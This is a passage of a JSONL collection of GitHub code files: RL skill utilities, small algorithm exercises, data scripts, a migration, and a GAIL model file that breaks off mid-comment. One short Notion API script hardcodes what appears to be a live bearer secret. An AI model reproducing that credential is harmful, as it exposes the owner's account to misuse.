entropy_rewards(reward_list)\n else:\n return None\n\ndef close_state(target_x, target_y, curr_x, curr_y):\n target_x = int(target_x*100)\n target_y = int(target_y*100)\n curr_x = int(curr_x*100)\n curr_y = int(curr_y*100)\n return (target_x == curr_x) and (target_y == curr_y)\n\ndef get_goal_xy_from_state(target_state):\n return target_state[6], target_state[7]\n\ndef get_goal_hxy_from_state(target_state):\n return target_state[10], target_state[11]\n\ndef get_state_hxy(target_state):\n return target_state[4], target_state[5] \n\ndef get_state_xy(target_state):\n return target_state[0], target_state[1] \n \ndef filter_state_conditions(target_state): \n filter_parking_spots = [(0.26, 0.14), (0.22, 0.14), (0.18, 0.14)] # filter to select spots\n true_spot = False\n for parking_spot in filter_parking_spots:\n gx, gy = get_goal_xy_from_state(target_state)\n if(close_state(gx, gy, parking_spot[0], parking_spot[1])):\n true_spot = True \n target_hx, target_hy = get_state_hxy(target_state)\n goal_hx, goal_hy = get_goal_hxy_from_state(target_state)\n return true_spot #and target_hx < 0 #target_hy > 0.2\n\ndef apply_parking_filter(states, actions, rews, seeds, lengths):\n new_states = []\n new_actions = []\n new_rews = []\n new_seeds = []\n new_lengths = []\n for episode in range(len(states)):\n all_states = states[episode][:lengths[episode]]\n if(not filter_state_conditions(all_states[0])):\n continue\n new_states.append(states[episode].numpy())\n new_actions.append(actions[episode].numpy())\n new_rews.append(rews[episode].numpy())\n new_seeds.append(seeds[episode].numpy())\n new_lengths.append(lengths[episode].item())\n return torch.FloatTensor(new_states), torch.FloatTensor(new_actions), torch.FloatTensor(new_rews), torch.FloatTensor(new_seeds),torch.LongTensor(new_lengths)\n\n\ndef get_target_rollouts(args_dict):\n model, batch, args = viz_utils.load_model_and_batch(args_dict)\n logs = defaultdict(lambda: defaultdict(list))\n states, actions, rews, lengths, seeds = batch \n if(args_dict[\"env_name\"] == \"parking\"):\n print(\"Applying Parking Filter\")\n states, actions, rews, seeds, lengths = apply_parking_filter(states, actions, rews, seeds, lengths)\n for skill in range(NUM_TYPE_SKILLS):\n for ei in range(args_dict[\"num_episodes\"]):\n if(args_dict[\"same_traj\"] and not args_dict[\"filter_episodes\"]):\n episode = 0\n elif(args_dict[\"filter_episodes\"]):\n episode = args_dict[\"filter_episodes\"][ei % len(args_dict[\"filter_episodes\"])]\n else:\n episode = ei\n all_states = states[episode][:lengths[episode]]\n all_actions= actions[episode][:lengths[episode]]\n all_rews = rews[episode][:lengths[episode]]\n seed = int(seeds[episode].item())\n if(args_dict[\"env_name\"] == \"lunar\"):\n logs[\"states\"][skill].append(all_states.tolist())\n logs[\"rews\"][skill].append(all_rews.tolist())\n logs[\"actions\"][skill].append([a-1 for a in all_actions])\n elif(args_dict[\"env_name\"] == \"parking\"):\n logs[\"states\"][skill].append(all_states)\n logs[\"rews\"][skill].append(all_rews)\n logs[\"actions\"][skill].append(all_actions)\n logs[\"seed\"][skill].append(seed)\n if(args_dict[\"compile_dir\"]):\n logs[\"compile\"][skill].append(get_target_compile_skills(args_dict, episode)[skill])\n logs[\"time\"][skill].append(get_target_time_skills(args_dict, episode, NUM_TYPE_SKILLS)[skill])\n else:\n logs[\"compile\"][skill].append(None)\n logs[\"time\"][skill].append(None)\n return dict(logs)\n\ndef get_sample_rollouts(args_dict):\n latent_skills_dict, states, lengths = get_all_skills(args_dict)\n 
print(lengths[:5])\n    logs = defaultdict(lambda: defaultdict(list))\n    # filter by specific skill\n    if(args_dict[\"chosen_skills\"]):\n        for skill_idx in range(NUM_TYPE_SKILLS):\n            chosen_skill = args_dict[\"chosen_skills\"][skill_idx]\n            for idx in args_dict[\"idx_for_fixed_skills\"][chosen_skill]:\n                logs[\"states\"][skill_idx].append(latent_skills_dict[\"states\"][chosen_skill][idx])\n                logs[\"actions\"][skill_idx].append(latent_skills_dict[\"actions\"][chosen_skill][idx])\n                logs[\"rews\"][skill_idx].append(latent_skills_dict[\"rews\"][chosen_skill][idx])\n                logs[\"seed\"][skill_idx].append(latent_skills_dict[\"seed\"][chosen_skill][idx])\n                logs[\"compile\"][skill_idx].append(latent_skills_dict[\"compile\"][chosen_skill][idx])\n                episode = latent_skills_dict[\"episode\"][chosen_skill][idx]\n                time_frames = get_target_time_skills(args_dict, episode, NUM_TYPE_SKILLS)\n                logs[\"time\"][skill_idx].append(time_frames[skill_idx])\n    # no skill filter\n    else:\n        for skill_idx in range(NUM_TYPE_SKILLS):\n            for idx in range(args_dict[\"num_episodes\"]):\n                logs[\"states\"][skill_idx].append(latent_skills_dict[\"states\"][skill_idx][idx])\n                logs[\"actions\"][skill_idx].append(latent_skills_dict[\"actions\"][skill_idx][idx])\n                logs[\"rews\"][skill_idx].append(latent_skills_dict[\"rews\"][skill_idx][idx])\n                logs[\"seed\"][skill_idx].append(latent_skills_dict[\"seed\"][skill_idx][idx])\n                logs[\"compile\"][skill_idx].append(latent_skills_dict[\"compile\"][skill_idx][idx])\n                episode = latent_skills_dict[\"episode\"][skill_idx][idx]\n                time_frames = get_target_time_skills(args_dict, episode, NUM_TYPE_SKILLS)\n                logs[\"time\"][skill_idx].append(time_frames[skill_idx])\n    return dict(logs)\n\n\n# Get Compile Skills for a Target Episode, helper function for full rollouts\ndef get_target_compile_skills(args_dict, episode):\n    print(\"Getting Compile Skills for Rollout\")\n    model, batch, compile_args = viz_utils.load_model_and_batch(args_dict)\n    states, actions, rews, lengths, seeds = batch\n    if(args_dict[\"env_name\"] == \"parking\"):\n        print(\"Applying Parking Filter\")\n        states, actions, rews, seeds, lengths = apply_parking_filter(states, actions, rews, seeds, lengths)\n    model.training = False\n    outputs = model.forward(states, actions, lengths)\n    z, z_idx, boundaries_by_latent, segments_by_latent, latents_by_segment, boundaries_by_episode = viz_utils.get_latent_info(outputs=outputs, lengths=lengths, args=compile_args)\n    target_boundaries = [b for b in boundaries_by_episode[episode] if b[1]-b[0] >= args_dict[\"min_skill_length\"]]\n    print(target_boundaries[::-1])\n    return target_boundaries[::-1]\n\n# Get Temporal Skills for a Target Episode, helper function for full rollouts\ndef get_target_time_skills(args_dict, episode, num_split):\n    print(\"Getting Time Skills for Rollout\")\n    model, batch, compile_args = viz_utils.load_model_and_batch(args_dict)\n    states, actions, rews, lengths, seeds = batch\n    if(args_dict[\"env_name\"] == \"parking\"):\n        print(\"Applying Parking Filter\")\n        states, actions, rews, seeds, lengths = apply_parking_filter(states, actions, rews, seeds, lengths)\n    episode_len = lengths[episode].item()\n    target_boundaries = get_time_split_frames(episode_len, num_split)\n    return target_boundaries[::-1]\n\n\ndef score_latent_skills(latent_skills_dict):\n    print(\"Scoring Skills!\")\n    for latent in latent_skills_dict['states'].keys():\n        print((latent, len(latent_skills_dict['states'][latent])))\n\n\ndef get_all_skills(args_dict):\n    model, batch, args = viz_utils.load_model_and_batch(args_dict)\n    states, actions, rews, lengths, seeds = batch\n    if(args_dict[\"env_name\"] == \"parking\"):\n        print(\"Applying Parking Filter\")\n        states, actions, rews, seeds, lengths = apply_parking_filter(states, actions, rews, seeds, lengths)\n    model.training = False\n    outputs = model.forward(states, actions, lengths)\n    z, z_idx, boundaries_by_latent, segments_by_latent, latents_by_segment, boundaries_by_episode = viz_utils.get_latent_info(outputs, lengths, args)\n    latent_skills_dict = defaultdict(lambda: defaultdict(list))\n    for latent in viz_utils.get_latent_and_segment_std(segments_by_latent):\n        boundaries = boundaries_by_latent[latent[0]]\n        boundary_diff_bool = [b[1][1]-b[1][0] < args_dict[\"min_skill_length\"] for b in boundaries]\n        if(all(boundary_diff_bool)):\n            continue\n        for b in boundaries:\n            episode = b[0]\n            if(b[1][1]-b[1][0] < args_dict[\"min_skill_length\"]+3):\n                continue\n            x1 = b[1][0]\n            x2 = b[1][1]\n            all_states = states[episode][:lengths[episode]]\n            all_actions = actions[episode][:lengths[episode]]\n            all_rews = rews[episode][:lengths[episode]]\n            seed = int(seeds[episode].item())\n            if(args_dict[\"env_name\"] == \"lunar\"):\n                latent_skills_dict[\"states\"][latent[0]].append(all_states.tolist())\n                latent_skills_dict[\"actions\"][latent[0]].append([a-1 for a in all_actions])\n                latent_skills_dict[\"rews\"][latent[0]].append(all_rews.tolist())\n            elif(args_dict[\"env_name\"] == \"parking\"):\n                latent_skills_dict[\"states\"][latent[0]].append(all_states)\n                latent_skills_dict[\"actions\"][latent[0]].append(all_actions)\n                latent_skills_dict[\"rews\"][latent[0]].append(all_rews)\n            latent_skills_dict[\"seed\"][latent[0]].append(seed)\n            latent_skills_dict[\"compile\"][latent[0]].append([x1, x2])\n            latent_skills_dict[\"episode\"][latent[0]].append(episode)\n    score_latent_skills(latent_skills_dict)\n    return latent_skills_dict, states, lengths\n\ndef get_eval_seeds(args_dict):\n    model, batch, args = viz_utils.load_model_and_batch(args_dict)\n    states, actions, rews, lengths, seeds = batch\n    if(args_dict[\"env_name\"] == \"parking\"):\n        print(\"Applying Parking Filter\")\n        states, actions, rews, seeds, lengths = apply_parking_filter(states, actions, rews, seeds, lengths)\n    print(seeds[:20])\n\ndef get_time_split_frames(max_t, num_split):\n    split_size = int(max_t/num_split)\n    frames = []\n    for x in range(split_size, max_t+1, split_size):\n        frames.append([x-split_size, x])\n    # go to end of trajectory\n    frames[-1][-1] = max_t\n    return frames\n","repo_name":"Stanford-ILIAD/teaching","sub_path":"compile/skill_utils.py","file_name":"skill_utils.py","file_ext":"py","file_size_in_byte":11192,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"}
+{"seq_id":"24859520003","text":"import numpy as np\n\n\ndef softmax(x, axis):\n    \"\"\"\n    Implements a *stabilized* softmax along the correct index\n    https://www.deeplearningbook.org/contents/numerical.html\n\n    Do not use scipy to implement this function!\n    \"\"\"\n    x = np.atleast_2d(x)\n    # subtract the per-axis maximum for numerical stability\n    x_sub = x - np.max(x, axis=axis, keepdims=True)\n    e = np.exp(x_sub)\n    # normalize along the same axis\n    return e / np.sum(e, axis=axis, keepdims=True)\n","repo_name":"devbhura/Machine-Learning","sub_path":"hw4-bayes/src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"}
+{"seq_id":"12964883468","text":"from matplotlib import pyplot as plt\n\n# This will have data by 
year based on the number of bedrooms and price per square foot\n\nx_labels = [\"Studio\", \"1-BR\", \"2-BR\", \"3-BR\", \"4+-BR\"]\nx = [0,1,2,3,4]\ny0 = [1632, 1918,2498,3041, 4000]\ny1 = [1677, 2024, 2627,3367, 4400]\ny2 = [1563,1908,2490,3304,4375]\n\nax = plt.subplot()\nplt.plot(x,y0, color=\"gold\", marker='o')\nplt.plot(x, y1, color=\"blue\", marker='o')\nplt.plot(x,y2, color=\"green\", marker='o')\nax.set_xticks([0,1,2,3,4])\nax.set_xticklabels(x_labels)\nax.yaxis.set_major_formatter('${x:1.0f}')\nplt.title(\"Rental Rates in Arlington County\")\nplt.xlabel(\"Number of Bedrooms\")\nplt.ylabel(\"Amount in Dollars\")\nplt.legend([2019,2020,2021], loc=4)\nplt.show()","repo_name":"Xpress0/Python-playground","sub_path":"arlington_rentals.py","file_name":"arlington_rentals.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} {"seq_id":"31156885234","text":"'''mapper.py'''\r\n\r\nimport sys\r\n\r\n# input comes from STDIN\r\nfor line in sys.stdin:\r\n    label, sentence = line.strip().split('\\t', 1)\r\n\r\n    # split the sentence into words\r\n    words = sentence.split()\r\n\r\n    # emit a count of 1 for every word\r\n    for word in words:\r\n        print(f'{word}\\t{1}')","repo_name":"ouyhlan/Distributed-System-Final-Project","sub_path":"src/WordCount/mapper.py","file_name":"mapper.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} {"seq_id":"29192015168","text":"class Node:\n    def __init__(self, data):\n        self.data = data\n        self.next = None\n\nclass LinkedList:\n    def __init__(self):\n        self.head = None\n\n    def insert(self, data):\n        new_node = Node(data)\n        new_node.next = self.head\n        self.head = new_node\n\n    def print_list(self):\n        temp = self.head\n        while temp:\n            print(temp.data, end=' ')\n            temp = temp.next\n        print('\\n')\n\n    def delete_position(self, position):\n        temp = self.head\n        prev = self.head\n\n        for i in range(1, position+1):\n            if i == position and position == 1:\n                self.head = self.head.next\n                temp = None\n                prev = None\n            elif i == position:\n                prev.next = temp.next\n                temp = None\n            else:\n                prev = temp\n                temp = temp.next\n                # stop early if position is greater than the number of elements in the list\n                if temp is None:\n                    break\n\n    def deletion_key(self, key):\n        if self.head.data == key:\n            self.head = self.head.next\n            return\n\n        temp = self.head\n        prev = self.head\n\n        while temp is not None and temp.data != key:\n            prev = temp\n            temp = temp.next\n        # the guard below handles the case where the key is not present in the list\n        if temp is not None:\n            prev.next = temp.next\n            temp = None\n\n\nif __name__ == '__main__':\n    ll = LinkedList()\n    for i in range(1, 6):\n        ll.insert(i)\n    ll.print_list()\n    ll.delete_position(6)\n    ll.print_list()\n    ll.deletion_key(10)\n    ll.print_list()\n\n","repo_name":"cspandit/Python-DS-and-Algo","sub_path":"single_link_list/operations/deletion.py","file_name":"deletion.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
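The streaming mapper above emits one word/count pair per token, so a full word count needs a matching reduce step. A minimal reducer sketch (a hypothetical companion file; assumes Hadoop Streaming has already sorted the mapper output by key):

'''reducer.py'''

import sys

current_word, current_count = None, 0
for line in sys.stdin:
    word, count = line.strip().split('\t', 1)
    if word == current_word:
        current_count += int(count)
    else:
        # sorted input guarantees the previous word is finished
        if current_word is not None:
            print(f'{current_word}\t{current_count}')
        current_word, current_count = word, int(count)
if current_word is not None:
    print(f'{current_word}\t{current_count}')

{"seq_id":"11188267591","text":"# -*- coding: utf-8 -*-\n# @Time : 2020/9/12 23:38\n# @Author : Rong\n# @email : mrrong0720@163.com\n\n# Given an array nums of n integers and a target value target, find the three integers in nums whose sum is closest to target. Return the sum of those three integers. You may assume each input has exactly one answer.\n# Example:\n# Input: nums = [-1,2,1,-4], target = 1\n# Output: 2\n# Explanation: The sum closest to target is 2 (-1 + 2 + 1 = 2).\n# Constraints:\n#\n# 3 <= nums.length <= 10^3\n# -10^3 <= nums[i] <= 10^3\n# -10^4 <= target <= 10^4\nfrom typing import List\n\n\nclass Solution:\n    def 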
threeSumClosest(self, nums: List[int], target: int) -> int:\n        n = len(nums)\n        nums.sort()  # sort first\n        ans = float('inf')\n\n        for first in range(n - 2):  # enumerate the first element\n            if first > 0 and nums[first] == nums[first - 1]: continue  # skip duplicate values of first\n\n            second, third = first + 1, n - 1\n            max_sum = nums[first] + nums[-2] + nums[-1]\n            min_sum = nums[first] + nums[first + 1] + nums[first + 2]\n            if max_sum <= target:  # the largest sum reachable with this first\n                if abs(max_sum - target) < abs(ans - target):\n                    ans = max_sum\n                continue\n            elif min_sum >= target:  # the smallest sum reachable with this first\n                if abs(min_sum - target) < abs(ans - target):\n                    ans = min_sum\n                break\n\n            while second < third:\n                two_sum_target = target - nums[first]\n                s = nums[second] + nums[third]\n                if abs(s + nums[first] - target) < abs(ans - target):\n                    ans = s + nums[first]\n                if s > two_sum_target:  # current sum too large: move the right pointer left\n                    third -= 1\n                    while third > second and nums[third] == nums[third + 1]:\n                        third -= 1\n                elif s < two_sum_target:  # current sum too small: move the left pointer right\n                    second += 1\n                    while third > second and nums[second] == nums[second - 1]:\n                        second += 1\n                else:  # exact hit: return target directly\n                    return target\n\n        return ans\ns = Solution()\nprint(s.threeSumClosest([-1,2,1,-4],1))","repo_name":"BrotherRong/leetcode","sub_path":"Python/16_threeSumClosest.py","file_name":"16_threeSumClosest.py","file_ext":"py","file_size_in_byte":2292,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
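Two spot checks for the two-pointer routine above (the second case is new; its closest triple is -3 + 1 + 2 = 0):

assert Solution().threeSumClosest([-1, 2, 1, -4], 1) == 2
assert Solution().threeSumClosest([0, 2, 1, -3], 1) == 0

{"seq_id":"29823360777","text":"#!/usr/bin/env python\n\nimport os\nimport sys\nimport argparse\nfrom textwrap import dedent\nimport yaml\nimport matplotlib as mpl\nimport pybedtools\nfrom pybedtools import featurefuncs as ff\n\nconfig_example = dedent(\n    \"\"\"\n    # After chromhmm.snakefile has been run, view the output and make\n    # a decision on what model to use. Enter that info here:\n    final_model:\n      subset: subset1\n      states: 6\n      celltype: umel\n\n    # Decide on the labels and colors you want to use. \"E1\" etc are the\n    # existing labels and correspond to the emission heatmaps for the model.\n\n    label_mapping:\n      # existing label   new label        color (hex)\n      # ---------------- ---------------- -----------\n      - ['E1', 'Active_TSS', '#5AA02C']\n      - ['E2', 'CTCF_open', '#4A80C8']\n      - ['E3', 'Enhancer', '#FA9B00']\n      - ['E4', 'weak_enhancer', '#FAF400']\n      - ['E5', 'no_signal', '#808080']\n      - ['E6', 'repressed', '#323232']\n    \"\"\")\n\nusage = dedent(\n    \"\"\"\n    Colorizes and re-labels output from ChromHMM.\n\n    Colors and labels are configured via a YAML-format file. 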
A documented\n    example can be generated with the --example-config option.\n    \"\"\")\n\nap = argparse.ArgumentParser(usage=usage)\nap.add_argument('--config', help='Config file to use')\nap.add_argument('--example-config', action='store_true',\n                help='Print an example config YAML and exit')\nargs = ap.parse_args()\n\nif args.config is None and not args.example_config:\n    ap.print_help()\n    sys.exit(0)\n\nif args.example_config:\n    print(config_example)\n    sys.exit(0)\n\ndef hex2rgb(x):\n    \"\"\"\n    BED files need CSV RGB, like \"128,34,234\", so convert hex colors to this\n    format.\n    \"\"\"\n    return ','.join(\n        map(\n            str,\n            (255 * mpl.colors.colorConverter.to_rgba_array(x))[0,:3].astype(int)\n        )\n    )\n\ncfg = yaml.load(open(args.config), Loader=yaml.SafeLoader)\n\n# identify the BED file to use\nbed = (\n    'models/{c[subset]}/{c[states]}/{c[celltype]}_{c[states]}_segments.bed'\n    .format(c=cfg['final_model'])\n)\nif not os.path.exists(bed):\n    raise ValueError(\"Cannot find file '{0}'.\".format(bed))\n\n\nlabels = {}\ncolors = {}\nfor existing, new, color in cfg['label_mapping']:\n    labels[existing] = new\n    colors[existing] = hex2rgb(color)\n\ndef transform(f):\n    f = ff.extend_fields(f, 9)\n    label = labels[f[3]]\n    color = colors[f[3]]\n    f[8] = color\n    f[3] = label\n    return f\n\nprint(pybedtools.BedTool(bed).each(transform))\n","repo_name":"daler/chromhmm-enhancers-umel","sub_path":"colorize_model.py","file_name":"colorize_model.py","file_ext":"py","file_size_in_byte":2560,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} {"seq_id":"18813650769","text":"# merge sort algorithm.\n\n# note: this uses quite a lot of extra space for the merged lists.\n\ndef merge_two_sorted_array(left,right):\n    sorted_array = []\n\n    first_length = len(left)\n    second_length = len(right)\n\n    i = j = 0\n\n    while i < first_length and j < second_length:\n        if left[i] < right[j]:\n            sorted_array.append(left[i])\n            i += 1\n        else:\n            sorted_array.append(right[j])\n            j += 1\n    \n    while i < first_length:\n        sorted_array.append(left[i])\n        i += 1\n    \n    while j < second_length:\n        sorted_array.append(right[j])\n        j += 1\n\n    return sorted_array\n\n\ndef merge_sort(arr):\n\n    # for len(arr) == 2, mid = 2 // 2 = 1,\n    # so the midpoint is never 0 here.\n\n    if len(arr) <= 1:\n        return arr\n    mid = len(arr) // 2\n    left = arr[:mid]\n    right = arr[mid:]\n\n    left = merge_sort(left)\n    right = merge_sort(right)\n\n    return merge_two_sorted_array(left,right)\n\n\narr = [5,6,2,1,0]\nprint(merge_sort(arr))\n","repo_name":"Saurabh1Barasiya/100_days_of_code","sub_path":"DSA/LinkList/merge_two_sorted_link_list/0_3_merge_sort.py","file_name":"0_3_merge_sort.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} {"seq_id":"13757502726","text":"import requests\n\nurl = \"https://api.notion.com/v1/databases/63d758d87e41483ebab7def5d939f616\"\n\nheaders = {\n    \"Accept\": \"application/json\",\n    \"Notion-Version\": \"2022-02-22\",\n    \"Authorization\": \"Bearer secret_V03L7Q3wQGwizHR1KStIE5yT3m1PM36JJhUouWfEdTj\"\n}\n\nresponse = requests.get(url, headers=headers)\n\nprint(response.text)","repo_name":"wlsvy/TIL","sub_path":"Document/NotionAutomation/try.py","file_name":"try.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
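The matplotlib-based hex2rgb above can be cross-checked against a pure-Python equivalent (a sketch that only handles plain '#RRGGBB' strings, whereas the record's version accepts any matplotlib color spec):

def hex2rgb_simple(x):
    """Pure-Python equivalent for '#RRGGBB' strings: '#5AA02C' -> '90,160,44'."""
    x = x.lstrip('#')
    return ','.join(str(int(x[i:i + 2], 16)) for i in (0, 2, 4))

assert hex2rgb_simple('#5AA02C') == '90,160,44'

{"seq_id":"11064715889","text":"import pandas as pd\r\ndata_set = pd.read_csv(r'C:\\Users\\Mr. 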
Abhinav\\Desktop\\my new file.csv')\r\nprint(data_set)\r\na=data_set\r\nimport numpy as np\r\n\r\ny=a['Data_value']\r\nb=list(a['Period'])\r\n\r\nb=[int(x) for x in b]\r\nb=np.array(b,dtype=np.int64,order='F')\r\nprint(b)\r\nb=np.reshape(b,(65748,1),order='F')\r\n\r\nprint(b.shape)\r\nfrom sklearn.linear_model import LinearRegression\r\nmind=LinearRegression()\r\nmind.fit(b,y)\r\nprint(mind.predict([[2050.01]]))","repo_name":"abhinavisgood/MyWork","sub_path":"my new mergeing program.py","file_name":"my new mergeing program.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13557331675","text":"\"\"\"Adding email column to the users table\n\nRevision ID: eca2190b17cc\nRevises: 6719bdb8c6a1\nCreate Date: 2021-03-11 13:00:32.040906\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'eca2190b17cc'\ndown_revision = '6719bdb8c6a1'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('users', sa.Column('email', sa.String(length=80), nullable=False))\n op.create_unique_constraint('users_email_key', 'users', ['email'])\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_constraint('users_email_key', 'users', type_='unique')\n op.drop_column('users', 'email')\n # ### end Alembic commands ###\n","repo_name":"stejstin1/PythonSqlAlchemy","sub_path":"migrations/versions/eca2190b17cc_adding_email_column_to_the_users_table.py","file_name":"eca2190b17cc_adding_email_column_to_the_users_table.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"33860970082","text":"#import time\r\nfrom config import ConfigFactory\r\nfrom config import Project\r\nfrom config import ScreenStreamConfig\r\nfrom streaming import ScreenShareClient\r\n\r\nif __name__ == \"__main__\":\r\n def main():\r\n cfg = ConfigFactory.config(Project.SCREENSTREAM)\r\n print(\"ip : {0}, port : {1}\".format(cfg.ip(), cfg.port()))\r\n \r\n sender = ScreenShareClient(cfg.ip(), cfg.port())\r\n sender.start_stream()\r\n \r\n while input(\"\") != \"STOP\":\r\n #time.sleep(0.001)\r\n continue\r\n \r\n sender.stop_stream()\r\n \r\n main()\r\n","repo_name":"zmalin/oybproject","sub_path":"oybstreamclient.py","file_name":"oybstreamclient.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37804835572","text":"from random import randint\nclass ListNode(object):\n\n\tdef __init__(self,x):\n\t\tself.val = x\n\t\tself.next = None\n\nclass Solution(object):\n\n\tdef __init__(self,head):\n\t\tself.head = head\n\n\n\tdef getRandom(self):\n\t\tselected = []\n\t\tk = 1\n\t\tcur_node = self.head\n\t\ti = 0\n\t\twhile cur_node:\n\t\t\tif i < k:\n\t\t\t\tselected.append(cur_node.val)\n\t\t\telse:\n\t\t\t\ts = randint(0,i)\n\t\t\t\tif s < k:\n\t\t\t\t\tselected[randint(0,k-1)] = cur_node.val\n\t\t\tcur_node = cur_node.next\n\t\t\ti+=1\n\n\t\treturn selected[0]\n\n\ndef main():\n\thead = ListNode(1)\n\thead.next = ListNode(6)\n\thead.next.next = ListNode(10)\n\ts = Solution(head)\n\tprint(s.getRandom())\n\n\nif __name__ == 
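The linked-list sampler above keeps a one-element reservoir; the same idea generalizes to k elements over any stream. A standard Algorithm R sketch (not part of the record):

from random import randint

def reservoir_sample(stream, k):
    """Return k items chosen uniformly from a stream of unknown length."""
    reservoir = []
    for i, item in enumerate(stream):
        if i < k:
            reservoir.append(item)
        else:
            j = randint(0, i)   # i + 1 equally likely slots
            if j < k:           # keep the item with probability k / (i + 1)
                reservoir[j] = item
    return reservoir

print(reservoir_sample(range(100), 5))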
'__main__':\n\tmain()","repo_name":"msaffarm/InterviewPrep","sub_path":"LeetCode/ReservoirSampling/382-LinkedListRandomNode.py","file_name":"382-LinkedListRandomNode.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"27774823642","text":"\"\"\"\n@Project : Imitation-Learning\n@File : model\n@Author : XiaoBanni\n@Date : 2021-05-02 18:38\n@Desc : \n\"\"\"\nimport numpy as np\nimport torch\nfrom torch import nn\nfrom torch.distributions import Normal\n\n\ndef init_weights(m):\n if isinstance(m, nn.Linear):\n # The weight is initialized to a normal distribution\n nn.init.normal_(m.weight, mean=0., std=0.1)\n # The bias is initialized to a constant\n nn.init.constant_(m.bias, 0.1)\n\n\ndef expert_reward(cfg, agent, state, action):\n \"\"\"\n The discriminator scores state-action pairs\n :param cfg:\n :param agent:\n :param state:\n :param action:\n :return:\n \"\"\"\n # .cpu()\n # Returns a copy of this object in CPU memory.\n\n # numpy cannot read CUDA tensor and\n # needs to convert it to CPU tensor\n # >>> a=torch.Tensor([1,2,3,4]).to(\"cuda\")\n # >>> a.numpy()\n # Traceback (most recent call last):\n # File \"\", line 1, in \n # TypeError: can't convert cuda:0 device type tensor to numpy. Use\n # Tensor.cpu() to copy the tensor to host memory first.\n state = state.cpu().numpy()\n state_action = torch.FloatTensor(np.concatenate([state, action], 1)).to(cfg.device)\n return -np.log(agent.discriminator(state_action).cpu().data.numpy())\n\n\nclass Discriminator(nn.Module):\n def __init__(self, input_dim, hidden_dim):\n super(Discriminator, self).__init__()\n\n self.linear1 = nn.Linear(input_dim, hidden_dim)\n self.linear2 = nn.Linear(hidden_dim, hidden_dim)\n self.linear3 = nn.Linear(hidden_dim, 1)\n\n # >>> m=nn.Linear(10,1)\n # >>> m\n # Linear(in_features=10, out_features=1, bias=True)\n # >>> m.weight\n # Parameter containing:\n # tensor([[ 0.0154, 0.2331, -0.1645, -0.1201, -0.0739, 0.0450, 0.0548, -0.2106,\n # -0.0479, 0.0109]], requires_grad=True)\n # >>> m.bias\n # Parameter containing:\n # tensor([-0.2276], requires_grad=True)\n # >>> m.weight.data.mul_(0.1)\n # tensor([[ 0.0015, 0.0233, -0.0164, -0.0120, -0.0074, 0.0045, 0.0055, -0.0211,\n # -0.0048, 0.0011]])\n # >>> m.weight.data.mul_(0.1)\n # tensor([[ 0.0002, 0.0023, -0.0016, -0.0012, -0.0007, 0.0004, 0.0005, -0.0021,\n # -0.0005, 0.0001]])\n # >>> m.bias.data.mul_(0)\n # tensor([-0.])\n self.linear3.weight.data.mul_(0.1)\n self.linear3.bias.data.mul_(0.0)\n\n def forward(self, x):\n # Discriminator measures the occupancy measurement\n x = torch.tanh(self.linear1(x))\n x = torch.tanh(self.linear2(x))\n prob = torch.sigmoid(self.linear3(x))\n return prob\n\n\nclass AdvantageActorCritic(nn.Module):\n def __init__(self, input_dim, output_dim, hidden_dim, std=0.0):\n super(AdvantageActorCritic, self).__init__()\n self.actor = nn.Sequential(\n nn.Linear(input_dim, hidden_dim),\n nn.ReLU(),\n nn.Linear(hidden_dim, output_dim)\n )\n\n self.critic = nn.Sequential(\n nn.Linear(input_dim, hidden_dim),\n nn.ReLU(),\n nn.Linear(hidden_dim, 1)\n )\n\n # torch.nn.Parameter():\n # A kind of Tensor that is to be considered a module parameter.\n #\n # Parameters are Tensor subclasses,\n # that have a very special property when used with Module s -\n # when they’re assigned as Module attributes\n # they are automatically added to the list of its parameters,\n # and will appear e.g. 
in parameters() iterator.\n # Assigning a Tensor doesn’t have such effect.\n # This is because one might want to cache some temporary state,\n # like last hidden state of the RNN, in the model.\n # If there was no such class as Parameter,\n # these temporaries would get registered too.\n #\n # >>> torch.Tensor([1,2,3]).requires_grad\n # False\n # >>> torch.nn.Parameter(torch.Tensor([1,2,3])).requires_grad\n # True\n\n # torch.ones():\n # Returns a tensor filled with the scalar value 1,\n # with the shape defined by the variable argument size.\n self.log_std = nn.Parameter(torch.ones(1, output_dim) * std)\n # .apply(fn)\n # Applies fn recursively to every submodule (as returned by .children()) as well as self.\n # Typical use includes initializing the parameters of a model (see also torch.nn.init).\n self.apply(init_weights)\n\n def forward(self, x):\n mu = self.actor(x) # Mean\n std = self.log_std.exp().expand_as(mu) # Standard deviation\n value = self.critic(x)\n # .expand_as()\n # Expand this tensor to the same size as other. \n # self.expand_as(other) is equivalent to self.expand(other.size()).\n # torch.distributions.normal.Normal(loc, scale, validate_args=None)\n # Creates a normal (also called Gaussian) distribution parameterized by loc and scale.\n # >>> m = 